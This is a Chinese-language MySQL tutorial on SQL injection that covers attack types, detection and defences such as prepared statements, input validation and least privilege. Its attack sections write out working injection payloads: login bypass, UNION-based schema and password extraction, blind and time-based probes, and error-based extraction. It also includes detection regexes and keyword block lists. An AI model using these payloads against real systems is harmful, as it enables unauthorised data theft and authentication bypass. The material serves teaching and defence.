🛡️ MySQL SQL 注入防护

SQL 注入攻击原理、检测与防护 - 保护数据库安全的重要技能

SQL 注入概述

SQL 注入是一种代码注入技术,攻击者通过在应用程序的输入字段中插入恶意 SQL 代码,来操作数据库执行非预期的操作。这是 Web 应用程序中最常见和最危险的安全漏洞之一。

🎯 数据泄露

获取敏感数据如用户密码、个人信息、商业机密等

🗑️ 数据破坏

删除或修改重要数据,破坏数据完整性

🔓 权限提升

绕过身份验证,获得管理员权限

💻 系统控制

在某些情况下可能获得服务器控制权

⚠️ SQL 注入的严重后果:
  • 敏感数据泄露(用户信息、财务数据)
  • 数据完整性被破坏
  • 身份验证绕过
  • 拒绝服务攻击
  • 系统完全被控制
  • 法律和合规问题
  • 品牌声誉损害

SQL 注入攻击类型

1. 经典 SQL 注入

-- 创建示例表 CREATE TABLE users ( id INT AUTO_INCREMENT PRIMARY KEY, username VARCHAR(50) UNIQUE, password VARCHAR(255), email VARCHAR(100), role VARCHAR(20) DEFAULT 'user', created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ); INSERT INTO users (username, password, email, role) VALUES ('admin', 'admin123', 'admin@example.com', 'admin'), ('john_doe', 'password123', 'john@example.com', 'user'), ('jane_smith', 'secret456', 'jane@example.com', 'user'), ('bob_wilson', 'mypass789', 'bob@example.com', 'user'); -- 易受攻击的查询示例(不要在生产环境使用) -- 假设应用程序直接拼接用户输入: -- SELECT * FROM users WHERE username = '$username' AND password = '$password' -- 正常查询 SELECT * FROM users WHERE username = 'john_doe' AND password = 'password123'; -- 攻击示例1:绕过密码验证 -- 用户输入: username = "admin' --", password = "anything" -- 生成的SQL: SELECT * FROM users WHERE username = 'admin' -- AND password = 'anything' SELECT * FROM users WHERE username = 'admin' -- AND password = 'anything'; -- 攻击示例2:联合查询注入 -- 用户输入: username = "' UNION SELECT 1,2,3,4,5,6 --" -- SELECT * FROM users WHERE username = '' UNION SELECT 1,2,3,4,5,6 -- AND password = '' -- 攻击示例3:获取所有用户数据 -- 用户输入: username = "' OR '1'='1" -- SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';

2. 盲注攻击

-- 盲注:攻击者无法直接看到查询结果,但可以通过应用程序的行为推断信息 -- 布尔盲注示例 -- 攻击者通过观察页面是否返回结果来推断信息 -- 测试数据库名称长度 -- 如果返回结果,说明数据库名长度大于5 SELECT * FROM users WHERE id = 1 AND LENGTH(DATABASE()) > 5; -- 逐字符猜测数据库名 -- 如果返回结果,说明数据库名第一个字符是 'm' SELECT * FROM users WHERE id = 1 AND SUBSTRING(DATABASE(), 1, 1) = 'm'; -- 时间盲注示例 -- 通过延时来判断条件是否成立 SELECT * FROM users WHERE id = 1 AND IF(LENGTH(DATABASE()) > 5, SLEEP(5), 0); -- 获取表名 SELECT * FROM users WHERE id = 1 AND ( SELECT COUNT(*) FROM information_schema.tables WHERE table_schema = DATABASE() AND table_name = 'users' ) > 0; -- 获取列名 SELECT * FROM users WHERE id = 1 AND ( SELECT COUNT(*) FROM information_schema.columns WHERE table_schema = DATABASE() AND table_name = 'users' AND column_name = 'password' ) > 0;

3. 联合查询注入

-- 联合查询注入:使用 UNION 操作符获取其他表的数据 -- 首先确定原查询的列数 -- 通过 ORDER BY 确定列数 SELECT * FROM users WHERE id = 1 ORDER BY 6; -- 如果报错,说明列数少于6 SELECT * FROM users WHERE id = 1 ORDER BY 5; -- 如果不报错,说明有5列 -- 使用 UNION 获取数据库信息 SELECT id, username, password, email, role FROM users WHERE id = -1 UNION SELECT 1, DATABASE(), VERSION(), USER(), 'info'; -- 获取所有数据库名 SELECT id, username, password, email, role FROM users WHERE id = -1 UNION SELECT 1, schema_name, 'db', 'info', 'data' FROM information_schema.schemata; -- 获取所有表名 SELECT id, username, password, email, role FROM users WHERE id = -1 UNION SELECT 1, table_name, table_schema, 'table', 'info' FROM information_schema.tables WHERE table_schema = DATABASE(); -- 获取所有列名 SELECT id, username, password, email, role FROM users WHERE id = -1 UNION SELECT 1, column_name, table_name, data_type, 'column' FROM information_schema.columns WHERE table_schema = DATABASE() AND table_name = 'users'; -- 获取敏感数据 SELECT id, username, password, email, role FROM users WHERE id = -1 UNION SELECT id, username, password, email, role FROM users;

4. 错误注入

-- 错误注入:通过触发数据库错误来获取信息 -- 创建一个会产生错误的查询来获取信息 -- 使用 extractvalue 函数触发错误 SELECT * FROM users WHERE id = 1 AND extractvalue(1, concat(0x7e, (SELECT DATABASE()), 0x7e)); -- 使用 updatexml 函数触发错误 SELECT * FROM users WHERE id = 1 AND updatexml(1, concat(0x7e, (SELECT USER()), 0x7e), 1); -- 通过除零错误获取信息 SELECT * FROM users WHERE id = 1 AND (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY concat(DATABASE(), floor(rand(0)*2))); -- 获取表名通过错误 SELECT * FROM users WHERE id = 1 AND extractvalue(1, concat(0x7e, ( SELECT table_name FROM information_schema.tables WHERE table_schema = DATABASE() LIMIT 1 ), 0x7e)); -- 获取列名通过错误 SELECT * FROM users WHERE id = 1 AND extractvalue(1, concat(0x7e, ( SELECT column_name FROM information_schema.columns WHERE table_schema = DATABASE() AND table_name = 'users' LIMIT 1 ), 0x7e));

5. 二阶注入

-- 二阶注入:恶意数据先被存储,然后在另一个查询中被执行 -- 创建日志表 CREATE TABLE user_logs ( id INT AUTO_INCREMENT PRIMARY KEY, user_id INT, action VARCHAR(100), details TEXT, created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ); -- 第一步:插入包含恶意代码的数据 -- 假设应用程序允许用户更新用户名,但没有正确转义 INSERT INTO users (username, password, email) VALUES ("admin' OR '1'='1' --", 'password', 'evil@example.com'); -- 第二步:当应用程序使用存储的用户名构建查询时 -- 假设应用程序记录用户活动: -- INSERT INTO user_logs (user_id, action, details) -- VALUES (1, 'login', 'User admin' OR '1'='1' -- logged in') -- 这可能导致意外的行为或数据泄露 -- 查看潜在的恶意用户名 SELECT id, username, 'POTENTIAL_INJECTION' as risk_level FROM users WHERE username LIKE "%'%" OR username LIKE "%\"%" OR username LIKE "%-%" OR username LIKE "%/*%" OR username LIKE "%*/%" OR username LIKE "%union%" OR username LIKE "%select%" OR username LIKE "%drop%" OR username LIKE "%delete%" OR username LIKE "%update%" OR username LIKE "%insert%";

SQL 注入检测

手动检测方法

-- 1. 单引号测试 -- 在输入中添加单引号,观察是否产生错误 -- 输入: test' -- 如果产生SQL语法错误,可能存在注入漏洞 -- 2. 逻辑测试 -- 输入: 1' OR '1'='1 -- 输入: 1' OR '1'='2 -- 比较两次结果,如果不同可能存在注入 -- 3. 时间延迟测试 -- 输入: 1'; WAITFOR DELAY '00:00:05' -- -- 输入: 1' AND SLEEP(5) -- -- 如果页面响应延迟,可能存在注入 -- 4. 联合查询测试 -- 输入: 1' UNION SELECT NULL -- -- 输入: 1' UNION SELECT NULL, NULL -- -- 逐步增加NULL的数量,直到不报错 -- 5. 错误信息测试 -- 输入: 1' AND extractvalue(1, concat(0x7e, version(), 0x7e)) -- -- 观察是否返回数据库版本信息

自动化检测工具

常用 SQL 注入检测工具:
  • SQLMap - 最流行的自动化SQL注入检测工具
  • Burp Suite - Web应用安全测试平台
  • OWASP ZAP - 开源Web应用安全扫描器
  • Netsparker - 商业Web漏洞扫描器
  • Acunetix - Web应用安全扫描器
  • Havij - 自动化SQL注入工具

数据库层面的检测

-- 创建SQL注入检测日志表 CREATE TABLE security_logs ( id INT AUTO_INCREMENT PRIMARY KEY, event_type VARCHAR(50), query_text TEXT, source_ip VARCHAR(45), user_agent TEXT, detected_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, risk_level ENUM('LOW', 'MEDIUM', 'HIGH', 'CRITICAL') DEFAULT 'LOW' ); -- 创建检测可疑查询的存储过程 DELIMITER // CREATE PROCEDURE DetectSQLInjection( IN query_text TEXT, IN source_ip VARCHAR(45), IN user_agent TEXT ) BEGIN DECLARE risk_level VARCHAR(10) DEFAULT 'LOW'; DECLARE suspicious_patterns TEXT DEFAULT ''; -- 检测常见的SQL注入模式 IF query_text REGEXP '(union|select|drop|delete|update|insert).*\\-\\-' THEN SET risk_level = 'CRITICAL'; SET suspicious_patterns = CONCAT(suspicious_patterns, 'SQL_COMMENT_INJECTION,'); END IF; IF query_text REGEXP "(or|and)\\s+['\"]?1['\"]?\\s*=\\s*['\"]?1['\"]?" THEN SET risk_level = 'HIGH'; SET suspicious_patterns = CONCAT(suspicious_patterns, 'TAUTOLOGY_INJECTION,'); END IF; IF query_text REGEXP 'union\\s+select' THEN SET risk_level = 'HIGH'; SET suspicious_patterns = CONCAT(suspicious_patterns, 'UNION_INJECTION,'); END IF; IF query_text REGEXP '(sleep|waitfor|benchmark)\\s*\\(' THEN SET risk_level = 'MEDIUM'; SET suspicious_patterns = CONCAT(suspicious_patterns, 'TIME_BASED_INJECTION,'); END IF; IF query_text REGEXP '(extractvalue|updatexml)\\s*\\(' THEN SET risk_level = 'HIGH'; SET suspicious_patterns = CONCAT(suspicious_patterns, 'ERROR_BASED_INJECTION,'); END IF; -- 如果检测到可疑模式,记录日志 IF suspicious_patterns != '' THEN INSERT INTO security_logs (event_type, query_text, source_ip, user_agent, risk_level) VALUES (suspicious_patterns, query_text, source_ip, user_agent, risk_level); END IF; END // DELIMITER ; -- 测试检测功能 CALL DetectSQLInjection( "SELECT * FROM users WHERE id = 1' OR '1'='1' --", '192.168.1.100', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ); CALL DetectSQLInjection( "SELECT * FROM users WHERE id = 1 UNION SELECT 1,2,3,4,5", '192.168.1.101', 'sqlmap/1.4.12' ); -- 查看检测结果 SELECT * FROM security_logs ORDER BY detected_at DESC; -- 统计安全事件 SELECT risk_level, COUNT(*) as event_count, COUNT(DISTINCT source_ip) as unique_ips FROM security_logs GROUP BY risk_level ORDER BY FIELD(risk_level, 'CRITICAL', 'HIGH', 'MEDIUM', 'LOW');

SQL 注入防护方法

🛡️ 参数化查询

使用预编译语句和参数绑定,最有效的防护方法

🔍 输入验证

严格验证和过滤用户输入,白名单优于黑名单

🔒 权限控制

最小权限原则,限制数据库用户权限

🚫 错误处理

不向用户显示详细的数据库错误信息

1. 参数化查询(推荐)

-- MySQL 预编译语句示例 -- 准备预编译语句 PREPARE stmt FROM 'SELECT * FROM users WHERE username = ? AND password = ?'; -- 设置参数 SET @username = 'john_doe'; SET @password = 'password123'; -- 执行查询 EXECUTE stmt USING @username, @password; -- 清理 DEALLOCATE PREPARE stmt; -- 即使输入包含恶意代码也是安全的 SET @username = "admin' OR '1'='1' --"; SET @password = 'anything'; PREPARE stmt FROM 'SELECT * FROM users WHERE username = ? AND password = ?'; EXECUTE stmt USING @username, @password; -- 这将查找用户名为 "admin' OR '1'='1' --" 的用户,而不会执行注入攻击 DEALLOCATE PREPARE stmt; -- 动态查询的安全实现 DELIMITER // CREATE PROCEDURE SafeUserLogin( IN p_username VARCHAR(50), IN p_password VARCHAR(255) ) BEGIN SELECT id, username, email, role FROM users WHERE username = p_username AND password = p_password; END // DELIMITER ; -- 安全调用 CALL SafeUserLogin('john_doe', 'password123'); CALL SafeUserLogin("admin' OR '1'='1' --", 'anything'); -- 安全,不会被注入

2. 输入验证和过滤

-- 创建输入验证函数 DELIMITER // CREATE FUNCTION ValidateInput( input_text TEXT, input_type VARCHAR(20) ) RETURNS BOOLEAN READS SQL DATA DETERMINISTIC BEGIN DECLARE is_valid BOOLEAN DEFAULT TRUE; -- 检查空值 IF input_text IS NULL OR TRIM(input_text) = '' THEN RETURN FALSE; END IF; -- 根据类型验证 CASE input_type WHEN 'username' THEN -- 用户名只允许字母、数字、下划线 IF input_text NOT REGEXP '^[a-zA-Z0-9_]{3,50}$' THEN SET is_valid = FALSE; END IF; WHEN 'email' THEN -- 简单的邮箱验证 IF input_text NOT REGEXP '^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$' THEN SET is_valid = FALSE; END IF; WHEN 'numeric' THEN -- 数字验证 IF input_text NOT REGEXP '^[0-9]+$' THEN SET is_valid = FALSE; END IF; WHEN 'alphanumeric' THEN -- 字母数字验证 IF input_text NOT REGEXP '^[a-zA-Z0-9]+$' THEN SET is_valid = FALSE; END IF; END CASE; -- 检查危险关键词 IF UPPER(input_text) REGEXP '(SELECT|INSERT|UPDATE|DELETE|DROP|UNION|SCRIPT|JAVASCRIPT|VBSCRIPT)' THEN SET is_valid = FALSE; END IF; -- 检查SQL注入模式 IF input_text REGEXP "(\\-\\-|\\/\\*|\\*\\/|;|\\||&|<|>|\\')" THEN SET is_valid = FALSE; END IF; RETURN is_valid; END // DELIMITER ; -- 测试验证函数 SELECT 'john_doe' as input, ValidateInput('john_doe', 'username') as is_valid_username; SELECT "admin' OR '1'='1' --" as input, ValidateInput("admin' OR '1'='1' --", 'username') as is_valid_username; SELECT 'user@example.com' as input, ValidateInput('user@example.com', 'email') as is_valid_email; SELECT 'DROP TABLE users' as input, ValidateInput('DROP TABLE users', 'username') as is_valid_username; -- 创建安全的用户注册过程 DELIMITER // CREATE PROCEDURE SafeRegisterUser( IN p_username VARCHAR(50), IN p_password VARCHAR(255), IN p_email VARCHAR(100) ) BEGIN DECLARE validation_error VARCHAR(255) DEFAULT ''; -- 验证输入 IF NOT ValidateInput(p_username, 'username') THEN SET validation_error = 'Invalid username format'; ELSEIF NOT ValidateInput(p_email, 'email') THEN SET validation_error = 'Invalid email format'; ELSEIF LENGTH(p_password) < 8 THEN SET validation_error = 'Password must be at least 8 characters'; END IF; -- 如果验证失败,返回错误 IF validation_error != '' THEN SELECT validation_error as error_message; ELSE -- 检查用户名是否已存在 IF EXISTS(SELECT 1 FROM users WHERE username = p_username) THEN SELECT 'Username already exists' as error_message; ELSE -- 安全插入新用户 INSERT INTO users (username, password, email) VALUES (p_username, p_password, p_email); SELECT 'User registered successfully' as success_message; END IF; END IF; END // DELIMITER ; -- 测试安全注册 CALL SafeRegisterUser('newuser', 'password123', 'newuser@example.com'); CALL SafeRegisterUser("admin' OR '1'='1' --", 'password', 'evil@example.com');

3. 权限控制

-- 创建专用的应用程序数据库用户 -- 不要使用 root 或管理员账户连接应用程序 -- 创建只读用户(用于查询操作) CREATE USER 'app_readonly'@'localhost' IDENTIFIED BY 'strong_password_123'; GRANT SELECT ON myapp.users TO 'app_readonly'@'localhost'; GRANT SELECT ON myapp.user_logs TO 'app_readonly'@'localhost'; -- 创建有限写入权限的用户(用于应用程序操作) CREATE USER 'app_user'@'localhost' IDENTIFIED BY 'another_strong_password_456'; GRANT SELECT, INSERT, UPDATE ON myapp.users TO 'app_user'@'localhost'; GRANT SELECT, INSERT ON myapp.user_logs TO 'app_user'@'localhost'; -- 注意:不给予 DELETE, DROP, CREATE, ALTER 权限 -- 创建备份用户(仅用于备份操作) CREATE USER 'backup_user'@'localhost' IDENTIFIED BY 'backup_password_789'; GRANT SELECT, LOCK TABLES ON myapp.* TO 'backup_user'@'localhost'; -- 查看用户权限 SHOW GRANTS FOR 'app_readonly'@'localhost'; SHOW GRANTS FOR 'app_user'@'localhost'; -- 限制危险函数的使用 -- 在 MySQL 配置中禁用危险函数 -- SET GLOBAL log_bin_trust_function_creators = 0; -- 创建安全视图,隐藏敏感列 CREATE VIEW safe_users_view AS SELECT id, username, email, role, created_at FROM users; -- 不包含 password 列 -- 给应用程序用户授权视图而不是原表 GRANT SELECT ON myapp.safe_users_view TO 'app_readonly'@'localhost'; -- 撤销对原表的直接访问(如果之前授权过) -- REVOKE ALL ON myapp.users FROM 'app_readonly'@'localhost';

4. 错误处理和日志记录

-- 创建安全的错误处理机制 -- 创建错误日志表 CREATE TABLE error_logs ( id INT AUTO_INCREMENT PRIMARY KEY, error_type VARCHAR(50), error_message TEXT, query_hash VARCHAR(64), -- 查询的哈希值,不记录实际查询 source_ip VARCHAR(45), user_agent TEXT, created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ); -- 创建安全的查询执行函数 DELIMITER // CREATE PROCEDURE SafeExecuteQuery( IN query_type VARCHAR(20), IN param1 VARCHAR(255), IN param2 VARCHAR(255), IN source_ip VARCHAR(45) ) BEGIN DECLARE EXIT HANDLER FOR SQLEXCEPTION BEGIN -- 记录错误但不暴露详细信息 INSERT INTO error_logs (error_type, error_message, source_ip) VALUES ('SQL_ERROR', 'Database operation failed', source_ip); -- 返回通用错误消息 SELECT 'An error occurred. Please try again later.' as error_message; END; -- 根据查询类型执行相应操作 CASE query_type WHEN 'login' THEN SELECT id, username, email, role FROM users WHERE username = param1 AND password = param2; WHEN 'get_user' THEN SELECT id, username, email, role FROM users WHERE id = CAST(param1 AS UNSIGNED); ELSE SELECT 'Invalid query type' as error_message; END CASE; END // DELIMITER ; -- 创建审计日志 CREATE TABLE audit_logs ( id INT AUTO_INCREMENT PRIMARY KEY, user_id INT, action VARCHAR(50), table_name VARCHAR(50), record_id INT, old_values JSON, new_values JSON, source_ip VARCHAR(45), created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ); -- 创建审计触发器 DELIMITER // CREATE TRIGGER users_audit_update AFTER UPDATE ON users FOR EACH ROW BEGIN INSERT INTO audit_logs ( user_id, action, table_name, record_id, old_values, new_values, source_ip ) VALUES ( NEW.id, 'UPDATE', 'users', NEW.id, JSON_OBJECT( 'username', OLD.username, 'email', OLD.email, 'role', OLD.role ), JSON_OBJECT( 'username', NEW.username, 'email', NEW.email, 'role', NEW.role ), @source_ip ); END // DELIMITER ; -- 测试安全查询执行 CALL SafeExecuteQuery('login', 'john_doe', 'password123', '192.168.1.100'); CALL SafeExecuteQuery('get_user', '1', '', '192.168.1.100'); -- 查看日志 SELECT * FROM error_logs; SELECT * FROM audit_logs;

代码层面的防护

PHP 防护示例

<?php // 错误的做法 - 容易受到SQL注入攻击 function vulnerableLogin($username, $password) { $connection = new mysqli("localhost", "user", "pass", "database"); // 直接拼接用户输入 - 危险! $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'"; $result = $connection->query($query); return $result->fetch_assoc(); } // 正确的做法 - 使用预编译语句 function secureLogin($username, $password) { $connection = new mysqli("localhost", "user", "pass", "database"); // 使用预编译语句 $stmt = $connection->prepare("SELECT id, username, email, role FROM users WHERE username = ? AND password = ?"); $stmt->bind_param("ss", $username, $password); $stmt->execute(); $result = $stmt->get_result(); return $result->fetch_assoc(); } // 输入验证函数 function validateInput($input, $type) { // 基本清理 $input = trim($input); $input = stripslashes($input); $input = htmlspecialchars($input); switch($type) { case 'username': return preg_match('/^[a-zA-Z0-9_]{3,50}$/', $input); case 'email': return filter_var($input, FILTER_VALIDATE_EMAIL); case 'numeric': return is_numeric($input); default: return false; } } // 安全的用户注册 function secureRegister($username, $password, $email) { // 验证输入 if (!validateInput($username, 'username')) { return ['error' => 'Invalid username format']; } if (!validateInput($email, 'email')) { return ['error' => 'Invalid email format']; } if (strlen($password) < 8) { return ['error' => 'Password must be at least 8 characters']; } $connection = new mysqli("localhost", "user", "pass", "database"); // 检查用户名是否已存在 $stmt = $connection->prepare("SELECT id FROM users WHERE username = ?"); $stmt->bind_param("s", $username); $stmt->execute(); if ($stmt->get_result()->num_rows > 0) { return ['error' => 'Username already exists']; } // 哈希密码 $hashedPassword = password_hash($password, PASSWORD_DEFAULT); // 插入新用户 $stmt = $connection->prepare("INSERT INTO users (username, password, email) VALUES (?, ?, ?)"); $stmt->bind_param("sss", $username, $hashedPassword, $email); if ($stmt->execute()) { return ['success' => 'User registered successfully']; } else { return ['error' => 'Registration failed']; } } // 使用示例 $result = secureLogin($_POST['username'], $_POST['password']); if ($result) { echo "Login successful"; } else { echo "Invalid credentials"; } ?>

Python 防护示例

import mysql.connector import re import hashlib from mysql.connector import Error class SecureDatabase: def __init__(self, host, user, password, database): self.connection = mysql.connector.connect( host=host, user=user, password=password, database=database ) def validate_input(self, input_value, input_type): """验证输入数据""" if not input_value or not input_value.strip(): return False input_value = input_value.strip() patterns = { 'username': r'^[a-zA-Z0-9_]{3,50}$', 'email': r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$', 'numeric': r'^[0-9]+$' } if input_type in patterns: return bool(re.match(patterns[input_type], input_value)) # 检查危险关键词 dangerous_keywords = ['select', 'insert', 'update', 'delete', 'drop', 'union', 'script'] for keyword in dangerous_keywords: if keyword.lower() in input_value.lower(): return False # 检查SQL注入模式 injection_patterns = [r"--", r"/\*", r"\*/", r";", r"\|", r"&", r"<", r">", r"'"] for pattern in injection_patterns: if re.search(pattern, input_value): return False return True def secure_login(self, username, password): """安全的用户登录""" try: # 验证输入 if not self.validate_input(username, 'username'): return {'error': 'Invalid username format'} cursor = self.connection.cursor(dictionary=True) # 使用参数化查询 query = "SELECT id, username, email, role, password FROM users WHERE username = %s" cursor.execute(query, (username,)) user = cursor.fetchone() if user and self.verify_password(password, user['password']): # 不返回密码 del user['password'] return {'success': True, 'user': user} else: return {'error': 'Invalid credentials'} except Error as e: # 记录错误但不暴露给用户 self.log_error('LOGIN_ERROR', str(e)) return {'error': 'Login failed. Please try again.'} finally: cursor.close() def secure_register(self, username, password, email): """安全的用户注册""" try: # 验证输入 if not self.validate_input(username, 'username'): return {'error': 'Invalid username format'} if not self.validate_input(email, 'email'): return {'error': 'Invalid email format'} if len(password) < 8: return {'error': 'Password must be at least 8 characters'} cursor = self.connection.cursor() # 检查用户名是否已存在 check_query = "SELECT id FROM users WHERE username = %s" cursor.execute(check_query, (username,)) if cursor.fetchone(): return {'error': 'Username already exists'} # 哈希密码 hashed_password = self.hash_password(password) # 插入新用户 insert_query = "INSERT INTO users (username, password, email) VALUES (%s, %s, %s)" cursor.execute(insert_query, (username, hashed_password, email)) self.connection.commit() return {'success': 'User registered successfully'} except Error as e: self.connection.rollback() self.log_error('REGISTER_ERROR', str(e)) return {'error': 'Registration failed. Please try again.'} finally: cursor.close() def hash_password(self, password): """哈希密码""" import bcrypt return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt()) def verify_password(self, password, hashed): """验证密码""" import bcrypt return bcrypt.checkpw(password.encode('utf-8'), hashed.encode('utf-8')) def log_error(self, error_type, error_message): """记录错误日志""" try: cursor = self.connection.cursor() log_query = "INSERT INTO error_logs (error_type, error_message) VALUES (%s, %s)" cursor.execute(log_query, (error_type, error_message)) self.connection.commit() except: pass # 静默处理日志错误 finally: cursor.close() # 使用示例 db = SecureDatabase('localhost', 'app_user', 'password', 'myapp') # 安全登录 result = db.secure_login('john_doe', 'password123') print(result) # 安全注册 result = db.secure_register('newuser', 'securepass123', 'newuser@example.com') print(result)

防护策略总结

防护方法 有效性 实现难度 性能影响 推荐程度
参数化查询 极高 极小 强烈推荐
输入验证 中等 推荐
权限控制 中等 推荐
错误处理 中等 推荐
字符转义 不推荐
黑名单过滤 中等 中等 不推荐
🛡️ 综合防护策略(推荐):
  1. 主要防线:使用参数化查询/预编译语句
  2. 输入层:严格的输入验证和白名单过滤
  3. 权限层:最小权限原则,专用数据库用户
  4. 应用层:安全的错误处理,不暴露敏感信息
  5. 监控层:实时监控和日志记录
  6. 网络层:使用 WAF(Web应用防火墙)
⚠️ 常见防护误区:
  • 仅依赖字符转义(容易被绕过)
  • 使用黑名单过滤(无法覆盖所有攻击向量)
  • 只在前端验证输入(可被绕过)
  • 使用管理员权限连接数据库
  • 向用户显示详细的数据库错误
  • 认为存储过程完全安全(仍可能被注入)
-- 清理示例对象 DROP TRIGGER IF EXISTS users_audit_update; DROP TABLE IF EXISTS audit_logs; DROP TABLE IF EXISTS error_logs; DROP TABLE IF EXISTS security_logs; DROP TABLE IF EXISTS user_logs; DROP TABLE IF EXISTS users; DROP PROCEDURE IF EXISTS SafeExecuteQuery; DROP PROCEDURE IF EXISTS DetectSQLInjection; DROP PROCEDURE IF EXISTS SafeRegisterUser; DROP FUNCTION IF EXISTS ValidateInput; DROP VIEW IF EXISTS safe_users_view; -- 清理用户(在生产环境中要谨慎) -- DROP USER IF EXISTS 'app_readonly'@'localhost'; -- DROP USER IF EXISTS 'app_user'@'localhost'; -- DROP USER IF EXISTS 'backup_user'@'localhost'; SELECT 'SQL injection prevention tutorial completed. All example objects cleaned up.' AS message;